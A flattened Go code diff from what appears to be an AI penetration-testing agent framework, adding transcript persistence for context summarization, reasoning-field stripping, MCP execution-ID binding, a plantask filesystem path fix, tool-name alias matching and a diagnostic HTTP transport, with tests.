zap.Int("tokens_before_estimated", beforeTokens),
zap.Int("tokens_after_estimated", afterTokens),
zap.Int("max_total_tokens", maxTotal),
zap.Int("trigger_context_tokens", trigger),
zap.String("transcript_file", transcriptPath),
)
return nil return nil
}, },
}) })
@@ -295,6 +342,23 @@ func splitMessagesIntoRounds(msgs []adk.Message) []messageRound {
return rounds return rounds
} }
// writeSummarizationTranscript persists pre-compaction history for read_file after summarization.
// Eino TranscriptFilePath only embeds the path in summary text; the file must be written by the host app.
func writeSummarizationTranscript(path string, msgs []adk.Message) error {
path = strings.TrimSpace(path)
if path == "" {
return nil
}
body := formatSummarizationTranscript(msgs)
if err := os.MkdirAll(filepath.Dir(path), 0o755); err != nil {
return fmt.Errorf("mkdir transcript dir: %w", err)
}
if err := os.WriteFile(path, []byte(body), 0o600); err != nil {
return fmt.Errorf("write transcript: %w", err)
}
return nil
}
func einoSummarizationTokenCounter(openAIModel string) summarization.TokenCounterFunc { func einoSummarizationTokenCounter(openAIModel string) summarization.TokenCounterFunc {
tc := agent.NewTikTokenCounter() tc := agent.NewTikTokenCounter()
return func(ctx context.Context, input *summarization.TokenCounterInput) (int, error) { return func(ctx context.Context, input *summarization.TokenCounterInput) (int, error) {
@@ -0,0 +1,35 @@
package multiagent
import (
"github.com/bytedance/sonic"
)
// stripReasoningFromSummarizationPayload removes thinking / reasoning fields from a
// chat-completions JSON body. Applied only to summarization Generate calls via
// model.ModelOptions on the shared ChatModel — main-agent requests are unchanged.
func stripReasoningFromSummarizationPayload(rawBody []byte) ([]byte, error) {
var payload map[string]any
if err := sonic.Unmarshal(rawBody, &payload); err != nil {
return rawBody, nil
}
changed := false
for _, key := range []string{
"thinking",
"reasoning_effort",
"output_config",
"reasoning",
} {
if _, ok := payload[key]; ok {
delete(payload, key)
changed = true
}
}
if !changed {
return rawBody, nil
}
out, err := sonic.Marshal(payload)
if err != nil {
return rawBody, err
}
return out, nil
}
@@ -0,0 +1,30 @@
package multiagent
import (
"strings"
"testing"
)
func TestStripReasoningFromSummarizationPayload(t *testing.T) {
in := []byte(`{"model":"deepseek-chat","messages":[],"thinking":{"type":"enabled"},"reasoning_effort":"high"}`)
out, err := stripReasoningFromSummarizationPayload(in)
if err != nil {
t.Fatal(err)
}
s := string(out)
if strings.Contains(s, "thinking") || strings.Contains(s, "reasoning_effort") {
t.Fatalf("expected reasoning fields stripped, got %s", s)
}
if !strings.Contains(s, `"model":"deepseek-chat"`) {
t.Fatalf("expected model preserved, got %s", s)
}
plain := []byte(`{"model":"gpt-4o","messages":[]}`)
out2, err := stripReasoningFromSummarizationPayload(plain)
if err != nil {
t.Fatal(err)
}
if string(out2) != string(plain) {
t.Fatalf("expected unchanged payload, got %s", out2)
}
}
@@ -2,6 +2,9 @@ package multiagent
import ( import (
"context" "context"
"os"
"path/filepath"
"strings"
"testing" "testing"
"github.com/cloudwego/eino/adk" "github.com/cloudwego/eino/adk"
@@ -343,3 +346,91 @@ func assertNoOrphanTool(t *testing.T, msgs []adk.Message) {
} }
} }
} }
func TestWriteSummarizationTranscript(t *testing.T) {
t.Parallel()
dir := t.TempDir()
path := filepath.Join(dir, "summarization", "transcript.txt")
msgs := []adk.Message{
schema.UserMessage("scan target"),
assistantToolCallsMsg("", "tc1"),
schema.ToolMessage("nmap output", "tc1"),
}
if err := writeSummarizationTranscript(path, msgs); err != nil {
t.Fatalf("writeSummarizationTranscript: %v", err)
}
body, err := os.ReadFile(path)
if err != nil {
t.Fatalf("read transcript: %v", err)
}
text := string(body)
if !strings.Contains(text, "Pre-compaction session record") {
t.Fatalf("missing transcript header: %q", text)
}
if !strings.Contains(text, "[user]") || !strings.Contains(text, "scan target") {
t.Fatalf("missing user section: %q", text)
}
if !strings.Contains(text, "tool_calls:") || !strings.Contains(text, "nmap output") {
t.Fatalf("missing tool round: %q", text)
}
}
func TestSanitizeSystemContentForTranscript_BestPractice(t *testing.T) {
t.Parallel()
system := strings.Join([]string{
"以下是当前会话绑定的工具名称索引(仅名称,无参数 JSON Schema)。",
"- nmap",
"- nuclei",
"",
"使用规则:",
"1) 上表仅为名称索引",
"5) 不要臆造不存在的工具名。",
"",
"你是CyberStrikeAI,是一个专业的网络安全渗透测试专家。",
"高强度扫描要求:全力出击",
"",
"## 项目黑板索引(project: 123, id: abc",
"(暂无事实)",
"需要写入请使用 upsert_project_fact。",
"",
"# Skills System",
"**How to Use Skills**",
"Remember: Skills make you more capable",
}, "\n")
out := sanitizeSystemContentForTranscript(system)
if strings.Contains(out, "以下是当前会话绑定的工具名称索引") {
t.Fatalf("tool index should be stripped: %q", out)
}
if strings.Contains(out, "- nmap") || strings.Contains(out, "高强度扫描要求") {
t.Fatalf("static persona should be stripped: %q", out)
}
if strings.Contains(out, "# Skills System") || strings.Contains(out, "How to Use Skills") {
t.Fatalf("skills boilerplate should be stripped: %q", out)
}
if !strings.Contains(out, transcriptStaticSystemOmitNote) {
t.Fatalf("missing omission note: %q", out)
}
if !strings.Contains(out, "## 项目黑板索引(project: 123, id: abc") {
t.Fatalf("project blackboard should be kept: %q", out)
}
}
func TestFormatSummarizationTranscript_OmitsBloatedSystem(t *testing.T) {
t.Parallel()
msgs := []adk.Message{
schema.SystemMessage("以下是当前会话绑定的工具名称索引\n- nmap\n\n你是CyberStrikeAI\n## 项目黑板索引(project: p1, id: x\n(暂无事实)\n# Skills System\nboiler"),
schema.UserMessage("hello"),
schema.AssistantMessage("reply", nil),
}
out := formatSummarizationTranscript(msgs)
if strings.Contains(out, "- nmap") {
t.Fatalf("tool list leaked into transcript: %q", out)
}
if !strings.Contains(out, "hello") || !strings.Contains(out, "reply") {
t.Fatalf("conversation turns missing: %q", out)
}
if !strings.Contains(out, "## 项目黑板索引(project: p1, id: x") {
t.Fatalf("dynamic blackboard missing: %q", out)
}
}
@@ -0,0 +1,145 @@
package multiagent
import (
"strings"
"github.com/cloudwego/eino/adk"
"github.com/cloudwego/eino/schema"
"github.com/bytedance/sonic"
)
const (
transcriptFileHeader = `# CyberStrikeAI summarization transcript
# Pre-compaction session record for read_file after context compression.
# Omits static system/tool-index/skills boilerplate; full user/assistant/tool turns below.
`
transcriptStaticSystemOmitNote = "[static system prompt omitted — unchanged in live context after compaction]"
transcriptToolIndexStartMarker = "以下是当前会话绑定的工具名称索引"
transcriptPersonaStartMarker = "你是CyberStrikeAI"
transcriptSkillsSystemMarker = "# Skills System"
transcriptProjectBlackboardMarker = "## 项目黑板索引"
)
// formatSummarizationTranscript renders pre-compaction messages for transcript.txt.
// Best practice: keep full user/assistant/tool turns; slim system to dynamic blocks only.
func formatSummarizationTranscript(msgs []adk.Message) string {
var sb strings.Builder
sb.WriteString(transcriptFileHeader)
wrote := false
for _, msg := range msgs {
if msg == nil {
continue
}
switch msg.Role {
case schema.System:
body := sanitizeSystemContentForTranscript(msg.Content)
if strings.TrimSpace(body) == "" {
continue
}
if wrote {
sb.WriteString("\n")
}
appendTranscriptSection(&sb, schema.System, body)
wrote = true
default:
if wrote {
sb.WriteString("\n")
}
appendTranscriptMessage(&sb, msg)
wrote = true
}
}
return sb.String()
}
func sanitizeSystemContentForTranscript(content string) string {
content = stripToolNamesIndexFromSystem(content)
content = stripSkillsSystemBoilerplate(content)
blackboard := extractProjectBlackboardSection(content)
var sb strings.Builder
sb.WriteString(transcriptStaticSystemOmitNote)
if bb := strings.TrimSpace(blackboard); bb != "" {
sb.WriteString("\n\n")
sb.WriteString(bb)
}
return sb.String()
}
func stripToolNamesIndexFromSystem(s string) string {
if !strings.Contains(s, transcriptToolIndexStartMarker) {
return s
}
idx := strings.Index(s, transcriptPersonaStartMarker)
if idx < 0 {
return s
}
return strings.TrimSpace(s[idx:])
}
func stripSkillsSystemBoilerplate(s string) string {
idx := strings.Index(s, transcriptSkillsSystemMarker)
if idx < 0 {
return strings.TrimSpace(s)
}
return strings.TrimSpace(s[:idx])
}
func extractProjectBlackboardSection(s string) string {
idx := strings.Index(s, transcriptProjectBlackboardMarker)
if idx < 0 {
return ""
}
return strings.TrimSpace(s[idx:])
}
func appendTranscriptSection(sb *strings.Builder, role schema.RoleType, body string) {
sb.WriteString("--- [")
sb.WriteString(string(role))
sb.WriteString("] ---\n")
sb.WriteString(body)
if !strings.HasSuffix(body, "\n") {
sb.WriteByte('\n')
}
}
func appendTranscriptMessage(sb *strings.Builder, msg adk.Message) {
sb.WriteString("--- [")
sb.WriteString(string(msg.Role))
sb.WriteString("] ---\n")
if msg.Content != "" {
sb.WriteString(msg.Content)
if !strings.HasSuffix(msg.Content, "\n") {
sb.WriteByte('\n')
}
}
if msg.ReasoningContent != "" {
sb.WriteString("[reasoning]\n")
sb.WriteString(msg.ReasoningContent)
if !strings.HasSuffix(msg.ReasoningContent, "\n") {
sb.WriteByte('\n')
}
}
for _, part := range msg.UserInputMultiContent {
if part.Type == schema.ChatMessagePartTypeText && strings.TrimSpace(part.Text) != "" {
sb.WriteString(part.Text)
if !strings.HasSuffix(part.Text, "\n") {
sb.WriteByte('\n')
}
}
}
if len(msg.ToolCalls) > 0 {
if b, err := sonic.Marshal(msg.ToolCalls); err == nil {
sb.WriteString("tool_calls: ")
sb.Write(b)
sb.WriteByte('\n')
}
}
if msg.ToolCallID != "" {
sb.WriteString("tool_call_id: ")
sb.WriteString(msg.ToolCallID)
sb.WriteByte('\n')
}
}
+4
View File
@@ -9,3 +9,7 @@ var ErrInterruptContinue = errors.New("agent interrupt: continue with user-suppl
// ErrTransientRetryContinue 表示 Run 因 429/网络等临时错误结束,应由 handler 落库轨迹后 // ErrTransientRetryContinue 表示 Run 因 429/网络等临时错误结束,应由 handler 落库轨迹后
// loadHistoryFromAgentTrace 再开下一轮 Run(与 ErrInterruptContinue 同级的「分段续跑」语义)。 // loadHistoryFromAgentTrace 再开下一轮 Run(与 ErrInterruptContinue 同级的「分段续跑」语义)。
var ErrTransientRetryContinue = errors.New("agent transient: retry after persisting trace") var ErrTransientRetryContinue = errors.New("agent transient: retry after persisting trace")
// ErrEmptyResponseContinue 表示 Eino ADK 会话正常结束但未捕获到助手正文,应由 handler 落库轨迹后
// loadHistoryFromAgentTrace 再开下一轮 Run(与 ErrInterruptContinue / ErrTransientRetryContinue 同级)。
var ErrEmptyResponseContinue = errors.New("agent empty response: continue after persisting trace")
@@ -0,0 +1,31 @@
package multiagent
import "strings"
// MCPExecutionBinder maps ADK toolCallID → MCP monitor execution ID for a single agent run.
type MCPExecutionBinder struct {
byToolCall map[string]string
}
func NewMCPExecutionBinder() *MCPExecutionBinder {
return &MCPExecutionBinder{byToolCall: make(map[string]string)}
}
func (b *MCPExecutionBinder) Bind(toolCallID, executionID string) {
if b == nil {
return
}
tid := strings.TrimSpace(toolCallID)
eid := strings.TrimSpace(executionID)
if tid == "" || eid == "" {
return
}
b.byToolCall[tid] = eid
}
func (b *MCPExecutionBinder) ExecutionID(toolCallID string) string {
if b == nil {
return ""
}
return b.byToolCall[strings.TrimSpace(toolCallID)]
}
@@ -0,0 +1,14 @@
package multiagent
import "testing"
func TestMCPExecutionBinder(t *testing.T) {
b := NewMCPExecutionBinder()
b.Bind("call-1", "exec-1")
if got := b.ExecutionID("call-1"); got != "exec-1" {
t.Fatalf("expected exec-1, got %q", got)
}
if got := b.ExecutionID("missing"); got != "" {
t.Fatalf("expected empty, got %q", got)
}
}
@@ -0,0 +1,71 @@
package multiagent
import (
"context"
"fmt"
"os"
"path/filepath"
"strings"
localbk "github.com/cloudwego/eino-ext/adk/backend/local"
"github.com/cloudwego/eino/adk/middlewares/plantask"
)
// localPlantaskBackend adapts eino-ext local filesystem backend for Eino plantask.
//
// plantask TaskCreate/TaskList list a directory via LsInfo, then Read using each entry's Path.
// local.LsInfo returns basenames only (e.g. ".highwatermark"), while local.Read expects a
// resolvable path — causing "file not found: .highwatermark" on the second TaskCreate.
type localPlantaskBackend struct {
*localbk.Local
}
func newLocalPlantaskBackend(loc *localbk.Local) *localPlantaskBackend {
if loc == nil {
return nil
}
return &localPlantaskBackend{Local: loc}
}
// LsInfo lists files under req.Path and returns absolute paths suitable for subsequent Read calls.
func (l *localPlantaskBackend) LsInfo(ctx context.Context, req *plantask.LsInfoRequest) ([]plantask.FileInfo, error) {
if l == nil || l.Local == nil {
return nil, fmt.Errorf("plantask backend: local nil")
}
if req == nil || strings.TrimSpace(req.Path) == "" {
return nil, fmt.Errorf("plantask backend: list path empty")
}
files, err := l.Local.LsInfo(ctx, req)
if err != nil {
return nil, err
}
if len(files) == 0 {
return files, nil
}
base := filepath.Clean(req.Path)
out := make([]plantask.FileInfo, len(files))
for i, f := range files {
out[i] = f
name := strings.TrimSpace(f.Path)
if name == "" {
continue
}
if filepath.IsAbs(name) {
out[i].Path = filepath.Clean(name)
continue
}
out[i].Path = filepath.Join(base, name)
}
return out, nil
}
func (l *localPlantaskBackend) Delete(ctx context.Context, req *plantask.DeleteRequest) error {
if l == nil || l.Local == nil || req == nil {
return nil
}
p := strings.TrimSpace(req.FilePath)
if p == "" {
return nil
}
return os.Remove(p)
}
@@ -0,0 +1,83 @@
package multiagent
import (
"context"
"os"
"path/filepath"
"testing"
localbk "github.com/cloudwego/eino-ext/adk/backend/local"
"github.com/cloudwego/eino/adk/filesystem"
"github.com/cloudwego/eino/adk/middlewares/plantask"
)
func TestLocalPlantaskBackendLsInfoReturnsFullPaths(t *testing.T) {
t.Parallel()
ctx := context.Background()
baseDir := t.TempDir()
loc, err := localbk.NewBackend(ctx, &localbk.Config{})
if err != nil {
t.Fatalf("NewBackend: %v", err)
}
be := newLocalPlantaskBackend(loc)
hwPath := filepath.Join(baseDir, ".highwatermark")
if err := os.WriteFile(hwPath, []byte("1"), 0o600); err != nil {
t.Fatalf("write highwatermark: %v", err)
}
files, err := be.LsInfo(ctx, &plantask.LsInfoRequest{Path: baseDir})
if err != nil {
t.Fatalf("LsInfo: %v", err)
}
if len(files) != 1 {
t.Fatalf("expected 1 file, got %d", len(files))
}
if files[0].Path != hwPath {
t.Fatalf("expected full path %q, got %q", hwPath, files[0].Path)
}
content, err := be.Read(ctx, &plantask.ReadRequest{FilePath: files[0].Path})
if err != nil {
t.Fatalf("Read via LsInfo path: %v", err)
}
if content.Content != "1" {
t.Fatalf("unexpected content: %q", content.Content)
}
}
func TestLocalPlantaskBackendSecondTaskCreateScenario(t *testing.T) {
t.Parallel()
ctx := context.Background()
baseDir := t.TempDir()
loc, err := localbk.NewBackend(ctx, &localbk.Config{})
if err != nil {
t.Fatalf("NewBackend: %v", err)
}
be := newLocalPlantaskBackend(loc)
hwPath := filepath.Join(baseDir, ".highwatermark")
if err := loc.Write(ctx, &filesystem.WriteRequest{FilePath: hwPath, Content: "1"}); err != nil {
t.Fatalf("seed highwatermark: %v", err)
}
files, err := be.LsInfo(ctx, &plantask.LsInfoRequest{Path: baseDir})
if err != nil {
t.Fatalf("LsInfo: %v", err)
}
var hwFile string
for _, f := range files {
if filepath.Base(f.Path) == ".highwatermark" {
hwFile = f.Path
break
}
}
if hwFile == "" {
t.Fatal("highwatermark not listed")
}
if _, err := be.Read(ctx, &plantask.ReadRequest{FilePath: hwFile}); err != nil {
t.Fatalf("Read highwatermark (second TaskCreate path): %v", err)
}
}
+13 -23
View File
@@ -58,6 +58,7 @@ func RunDeepAgent(
ag *agent.Agent, ag *agent.Agent,
logger *zap.Logger, logger *zap.Logger,
conversationID string, conversationID string,
projectID string,
userMessage string, userMessage string,
history []agent.ChatMessage, history []agent.ChatMessage,
roleTools []string, roleTools []string,
@@ -107,10 +108,12 @@ func RunDeepAgent(
var mcpIDsMu sync.Mutex var mcpIDsMu sync.Mutex
var mcpIDs []string var mcpIDs []string
recorder := func(id string) { mcpExecBinder := NewMCPExecutionBinder()
recorder := func(id, toolCallID string) {
if id == "" { if id == "" {
return return
} }
mcpExecBinder.Bind(toolCallID, id)
mcpIDsMu.Lock() mcpIDsMu.Lock()
mcpIDs = append(mcpIDs, id) mcpIDs = append(mcpIDs, id)
mcpIDsMu.Unlock() mcpIDsMu.Unlock()
@@ -128,21 +131,6 @@ func RunDeepAgent(
toolInvokeNotify := einomcp.NewToolInvokeNotifyHolder() toolInvokeNotify := einomcp.NewToolInvokeNotifyHolder()
mainDefs := ag.ToolsForRole(roleTools) mainDefs := ag.ToolsForRole(roleTools)
toolOutputChunk := func(toolName, toolCallID, chunk string) {
// When toolCallId is missing, frontend ignores tool_result_delta.
if progress == nil || toolCallID == "" {
return
}
progress("tool_result_delta", chunk, map[string]interface{}{
"toolName": toolName,
"toolCallId": toolCallID,
// index/total/iteration are optional for UI; we don't know them in this bridge.
"index": 0,
"total": 0,
"iteration": 0,
"source": "eino",
})
}
httpClient := &http.Client{ httpClient := &http.Client{
Timeout: 30 * time.Minute, Timeout: 30 * time.Minute,
@@ -161,6 +149,7 @@ func RunDeepAgent(
// 若配置为 Claude provider,注入自动桥接 transport,对 Eino 透明走 Anthropic Messages API // 若配置为 Claude provider,注入自动桥接 transport,对 Eino 透明走 Anthropic Messages API
httpClient = openai.NewEinoHTTPClient(&appCfg.OpenAI, httpClient) httpClient = openai.NewEinoHTTPClient(&appCfg.OpenAI, httpClient)
openai.AttachSummarizationDiagTransport(httpClient, logger)
baseModelCfg := &einoopenai.ChatModelConfig{ baseModelCfg := &einoopenai.ChatModelConfig{
APIKey: appCfg.OpenAI.APIKey, APIKey: appCfg.OpenAI.APIKey,
@@ -209,12 +198,12 @@ func RunDeepAgent(
} }
subDefs := ag.ToolsForRole(roleTools) subDefs := ag.ToolsForRole(roleTools)
subTools, err := einomcp.ToolsFromDefinitions(ag, holder, subDefs, recorder, toolOutputChunk, toolInvokeNotify, id) subTools, err := einomcp.ToolsFromDefinitions(ag, holder, subDefs, recorder, nil, toolInvokeNotify, id)
if err != nil { if err != nil {
return nil, fmt.Errorf("子代理 %q 工具: %w", id, err) return nil, fmt.Errorf("子代理 %q 工具: %w", id, err)
} }
subToolsForCfg, subPre, subToolSearchActive, err := prependEinoMiddlewares(ctx, &ma.EinoMiddleware, einoMWSub, subTools, einoLoc, skillsRoot, conversationID, logger) subToolsForCfg, subPre, subToolSearchActive, err := prependEinoMiddlewares(ctx, &ma.EinoMiddleware, einoMWSub, subTools, einoLoc, skillsRoot, conversationID, projectID, logger)
if err != nil { if err != nil {
return nil, fmt.Errorf("子代理 %q eino 中间件: %w", id, err) return nil, fmt.Errorf("子代理 %q eino 中间件: %w", id, err)
} }
@@ -232,7 +221,7 @@ func RunDeepAgent(
} }
if einoSkillMW != nil { if einoSkillMW != nil {
if einoFSTools && einoLoc != nil { if einoFSTools && einoLoc != nil {
subFs, fsErr := subAgentFilesystemMiddleware(ctx, einoLoc, toolInvokeNotify, id, einoExecMonitor, agentToolTimeoutMinutes(appCfg), toolOutputChunk) subFs, fsErr := subAgentFilesystemMiddleware(ctx, einoLoc, toolInvokeNotify, id, einoExecMonitor, agentToolTimeoutMinutes(appCfg), nil)
if fsErr != nil { if fsErr != nil {
return nil, fmt.Errorf("子代理 %q filesystem 中间件: %w", id, fsErr) return nil, fmt.Errorf("子代理 %q filesystem 中间件: %w", id, fsErr)
} }
@@ -319,11 +308,11 @@ func RunDeepAgent(
} }
} }
mainTools, err := einomcp.ToolsFromDefinitions(ag, holder, mainDefs, recorder, toolOutputChunk, toolInvokeNotify, orchestratorName) mainTools, err := einomcp.ToolsFromDefinitions(ag, holder, mainDefs, recorder, nil, toolInvokeNotify, orchestratorName)
if err != nil { if err != nil {
return nil, err return nil, err
} }
mainToolsForCfg, mainOrchestratorPre, mainToolSearchActive, err := prependEinoMiddlewares(ctx, &ma.EinoMiddleware, einoMWMain, mainTools, einoLoc, skillsRoot, conversationID, logger) mainToolsForCfg, mainOrchestratorPre, mainToolSearchActive, err := prependEinoMiddlewares(ctx, &ma.EinoMiddleware, einoMWMain, mainTools, einoLoc, skillsRoot, conversationID, projectID, logger)
if err != nil { if err != nil {
return nil, err return nil, err
} }
@@ -370,7 +359,7 @@ func RunDeepAgent(
inner: einoLoc, inner: einoLoc,
invokeNotify: toolInvokeNotify, invokeNotify: toolInvokeNotify,
einoAgentName: orchestratorName, einoAgentName: orchestratorName,
outputChunk: toolOutputChunk, outputChunk: nil,
recordMonitor: einoExecMonitor, recordMonitor: einoExecMonitor,
toolTimeoutMinutes: agentToolTimeoutMinutes(appCfg), toolTimeoutMinutes: agentToolTimeoutMinutes(appCfg),
} }
@@ -437,7 +426,7 @@ func RunDeepAgent(
// 构建 filesystem 中间件(与 Deep sub-agent 一致) // 构建 filesystem 中间件(与 Deep sub-agent 一致)
var peFsMw adk.ChatModelAgentMiddleware var peFsMw adk.ChatModelAgentMiddleware
if einoSkillMW != nil && einoFSTools && einoLoc != nil { if einoSkillMW != nil && einoFSTools && einoLoc != nil {
peFsMw, err = subAgentFilesystemMiddleware(ctx, einoLoc, toolInvokeNotify, "executor", einoExecMonitor, agentToolTimeoutMinutes(appCfg), toolOutputChunk) peFsMw, err = subAgentFilesystemMiddleware(ctx, einoLoc, toolInvokeNotify, "executor", einoExecMonitor, agentToolTimeoutMinutes(appCfg), nil)
if err != nil { if err != nil {
return nil, fmt.Errorf("plan_execute filesystem 中间件: %w", err) return nil, fmt.Errorf("plan_execute filesystem 中间件: %w", err)
} }
@@ -564,6 +553,7 @@ func RunDeepAgent(
McpIDs: &mcpIDs, McpIDs: &mcpIDs,
FilesystemMonitorAgent: ag, FilesystemMonitorAgent: ag,
FilesystemMonitorRecord: recorder, FilesystemMonitorRecord: recorder,
MCPExecutionBinder: mcpExecBinder,
ToolInvokeNotify: toolInvokeNotify, ToolInvokeNotify: toolInvokeNotify,
DA: da, DA: da,
ModelFacingTrace: modelFacingTrace, ModelFacingTrace: modelFacingTrace,
@@ -0,0 +1,72 @@
package multiagent
import (
"strings"
)
// expandAlwaysVisibleNameSet 将配置中的常驻工具名展开为可匹配运行时工具名的集合。
// 支持:内置短名 read_file;外部 mcp::tool;运行时 mcp__toolOpenAI/Eino 命名)。
func expandAlwaysVisibleNameSet(names []string) map[string]struct{} {
set := make(map[string]struct{}, len(names)*3)
add := func(name string) {
n := strings.TrimSpace(strings.ToLower(name))
if n == "" {
return
}
set[n] = struct{}{}
}
for _, raw := range names {
n := strings.TrimSpace(strings.ToLower(raw))
if n == "" {
continue
}
add(n)
if mcp, tool, ok := strings.Cut(n, "::"); ok && mcp != "" && tool != "" {
// 外部工具用 mcp::tool 配置时只展开运行时 mcp__tool,避免短名误伤其它 MCP 同名工具。
add(mcp + "__" + tool)
continue
}
if idx := strings.LastIndex(n, "__"); idx > 0 {
mcp, tool := n[:idx], n[idx+2:]
if mcp != "" && tool != "" {
add(mcp + "::" + tool)
}
continue
}
}
return set
}
// toolMatchesAlwaysVisible 判断运行时工具名是否命中常驻白名单(含别名)。
func toolMatchesAlwaysVisible(runtimeName string, nameSet map[string]struct{}) bool {
if len(nameSet) == 0 {
return false
}
name := strings.TrimSpace(strings.ToLower(runtimeName))
if name == "" {
return false
}
if _, ok := nameSet[name]; ok {
return true
}
if mcp, tool, ok := strings.Cut(name, "::"); ok && mcp != "" && tool != "" {
if _, ok := nameSet[mcp+"__"+tool]; ok {
return true
}
if _, ok := nameSet[tool]; ok {
return true
}
}
if idx := strings.LastIndex(name, "__"); idx > 0 {
mcp, tool := name[:idx], name[idx+2:]
if mcp != "" && tool != "" {
if _, ok := nameSet[mcp+"::"+tool]; ok {
return true
}
if _, ok := nameSet[tool]; ok {
return true
}
}
}
return false
}
@@ -0,0 +1,32 @@
package multiagent
import "testing"
func TestToolMatchesAlwaysVisible_ExternalAliases(t *testing.T) {
t.Parallel()
set := expandAlwaysVisibleNameSet([]string{"zhidemai::discount_search", "read_file"})
cases := []struct {
runtime string
want bool
}{
{"zhidemai__discount_search", true},
{"zhidemai::discount_search", true},
{"read_file", true},
{"zhidemai__product_search_pro", false},
{"github__discount_search", false},
}
for _, tc := range cases {
if got := toolMatchesAlwaysVisible(tc.runtime, set); got != tc.want {
t.Fatalf("toolMatchesAlwaysVisible(%q) = %v, want %v", tc.runtime, got, tc.want)
}
}
}
func TestExpandAlwaysVisibleNameSet_LegacyShortName(t *testing.T) {
t.Parallel()
set := expandAlwaysVisibleNameSet([]string{"discount_search"})
if !toolMatchesAlwaysVisible("zhidemai__discount_search", set) {
t.Fatal("legacy short name should match external runtime tool")
}
}
+88
View File
@@ -0,0 +1,88 @@
package openai
import (
"bytes"
"io"
"net/http"
"strings"
"github.com/bytedance/sonic"
"go.uber.org/zap"
)
// SummarizationRequestHeader marks chat/completion requests issued by Eino summarization
// middleware (via model.WithExtraHeader). The diagnostic transport logs empty-choices bodies
// only for these requests so main-agent traffic stays quiet.
const SummarizationRequestHeader = "X-CyberStrike-Summarization"
const summarizationDiagBodyMaxBytes = 8192
// AttachSummarizationDiagTransport wraps client.Transport to log raw API bodies when
// summarization receives HTTP 200 with an empty choices array.
func AttachSummarizationDiagTransport(client *http.Client, logger *zap.Logger) {
if client == nil || logger == nil {
return
}
base := client.Transport
if base == nil {
base = http.DefaultTransport
}
client.Transport = &summarizationDiagRoundTripper{base: base, logger: logger}
}
type summarizationDiagRoundTripper struct {
base http.RoundTripper
logger *zap.Logger
}
func (rt *summarizationDiagRoundTripper) RoundTrip(req *http.Request) (*http.Response, error) {
resp, err := rt.base.RoundTrip(req)
if err != nil || resp == nil || resp.Body == nil {
return resp, err
}
if !isSummarizationRequest(req) || !strings.Contains(strings.ToLower(resp.Header.Get("Content-Type")), "json") {
return resp, err
}
body, readErr := io.ReadAll(resp.Body)
_ = resp.Body.Close()
if readErr != nil {
resp.Body = io.NopCloser(bytes.NewReader(nil))
return resp, err
}
resp.Body = io.NopCloser(bytes.NewReader(body))
resp.ContentLength = int64(len(body))
if rt.logger != nil && summarizationResponseEmptyChoices(body) {
rt.logger.Warn("eino summarization: API returned empty choices",
zap.Int("status", resp.StatusCode),
zap.Int("response_bytes", len(body)),
zap.String("raw_body", truncateForLog(string(body), summarizationDiagBodyMaxBytes)),
)
}
return resp, err
}
func isSummarizationRequest(req *http.Request) bool {
if req == nil {
return false
}
return strings.TrimSpace(req.Header.Get(SummarizationRequestHeader)) == "1"
}
func summarizationResponseEmptyChoices(body []byte) bool {
var parsed struct {
Choices []any `json:"choices"`
}
if err := sonic.Unmarshal(body, &parsed); err != nil {
return false
}
return len(parsed.Choices) == 0
}
func truncateForLog(s string, maxBytes int) string {
if maxBytes <= 0 || len(s) <= maxBytes {
return s
}
return s[:maxBytes] + "…(truncated)"
}
@@ -0,0 +1,47 @@
package openai
import (
"io"
"net/http"
"strings"
"testing"
"go.uber.org/zap"
)
type staticRoundTripper struct {
status int
body string
}
func (s *staticRoundTripper) RoundTrip(req *http.Request) (*http.Response, error) {
return &http.Response{
StatusCode: s.status,
Header: http.Header{"Content-Type": []string{"application/json"}},
Body: io.NopCloser(strings.NewReader(s.body)),
}, nil
}
func TestSummarizationResponseEmptyChoices(t *testing.T) {
if !summarizationResponseEmptyChoices([]byte(`{"choices":[]}`)) {
t.Fatal("expected empty choices")
}
if summarizationResponseEmptyChoices([]byte(`{"choices":[{"index":0}]}`)) {
t.Fatal("expected non-empty choices")
}
}
func TestSummarizationDiagRoundTripper_SkipsWithoutHeader(t *testing.T) {
client := &http.Client{
Transport: &summarizationDiagRoundTripper{
base: &staticRoundTripper{status: 200, body: `{"choices":[]}`},
logger: zap.NewNop(),
},
}
req, _ := http.NewRequest(http.MethodPost, "https://example.com/v1/chat/completions", nil)
resp, err := client.Do(req)
if err != nil {
t.Fatal(err)
}
_ = resp.Body.Close()
}
+11 -247
View File
@@ -16,7 +16,6 @@ import (
"cyberstrike-ai/internal/config" "cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/mcp" "cyberstrike-ai/internal/mcp"
"cyberstrike-ai/internal/storage"
"github.com/creack/pty" "github.com/creack/pty"
"go.uber.org/zap" "go.uber.org/zap"
@@ -33,44 +32,25 @@ var ToolOutputCallbackCtxKey = toolOutputCallbackCtxKey{}
// Executor 安全工具执行器 // Executor 安全工具执行器
type Executor struct { type Executor struct {
config *config.SecurityConfig config *config.SecurityConfig
toolIndex map[string]*config.ToolConfig // 工具索引,用于 O(1) 查找 toolIndex map[string]*config.ToolConfig // 工具索引,用于 O(1) 查找
mcpServer *mcp.Server mcpServer *mcp.Server
logger *zap.Logger logger *zap.Logger
resultStorage ResultStorage // 结果存储(用于查询工具)
}
// ResultStorage 结果存储接口(直接使用 storage 包的类型)
type ResultStorage interface {
SaveResult(executionID string, toolName string, result string) error
GetResult(executionID string) (string, error)
GetResultPage(executionID string, page int, limit int) (*storage.ResultPage, error)
SearchResult(executionID string, keyword string, useRegex bool) ([]string, error)
FilterResult(executionID string, filter string, useRegex bool) ([]string, error)
GetResultMetadata(executionID string) (*storage.ResultMetadata, error)
GetResultPath(executionID string) string
DeleteResult(executionID string) error
} }
// NewExecutor 创建新的执行器 // NewExecutor 创建新的执行器
func NewExecutor(cfg *config.SecurityConfig, mcpServer *mcp.Server, logger *zap.Logger) *Executor { func NewExecutor(cfg *config.SecurityConfig, mcpServer *mcp.Server, logger *zap.Logger) *Executor {
executor := &Executor{ executor := &Executor{
config: cfg, config: cfg,
toolIndex: make(map[string]*config.ToolConfig), toolIndex: make(map[string]*config.ToolConfig),
mcpServer: mcpServer, mcpServer: mcpServer,
logger: logger, logger: logger,
resultStorage: nil, // 稍后通过 SetResultStorage 设置
} }
// 构建工具索引 // 构建工具索引
executor.buildToolIndex() executor.buildToolIndex()
return executor return executor
} }
// SetResultStorage 设置结果存储
func (e *Executor) SetResultStorage(storage ResultStorage) {
e.resultStorage = storage
}
// buildToolIndex 构建工具索引,将 O(n) 查找优化为 O(1) // buildToolIndex 构建工具索引,将 O(n) 查找优化为 O(1)
